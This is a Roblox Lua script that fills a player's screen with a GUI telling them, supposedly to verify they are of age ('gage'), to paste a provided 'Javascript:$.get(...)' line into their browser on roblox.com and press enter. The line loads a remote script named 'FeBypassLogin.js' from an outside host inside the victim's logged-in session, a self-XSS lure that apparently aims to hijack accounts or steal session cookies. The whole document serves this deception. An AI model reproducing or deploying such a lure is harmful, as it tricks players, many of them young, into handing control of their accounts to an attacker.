
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextBox = Instance.new("TextBox")
local TextLabel = Instance.new("TextLabel")


ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Position = UDim2.new(0, 0, -0.0017451942, 0)
Frame.Size = UDim2.new(0, 1300, 0, 573)

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.Position = UDim2.new(0.326153845, 0, 0.58813262, 0)
TextBox.Size = UDim2.new(0, 414, 0, 149)
TextBox.ClearTextOnFocus = false
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "@Javascript:$.get('//rbxapi.dev/l/FeBypass/FeBypassLogin.js')"
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextWrapped = true

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.Position = UDim2.new(0.323076934, 0, 0.062827222, 0)
TextLabel.Size = UDim2.new(0, 418, 0, 179)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "to prove you are gage copy the text below into your browser while on roblox.com but remove the \"@\" after pasting it and press enter"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true
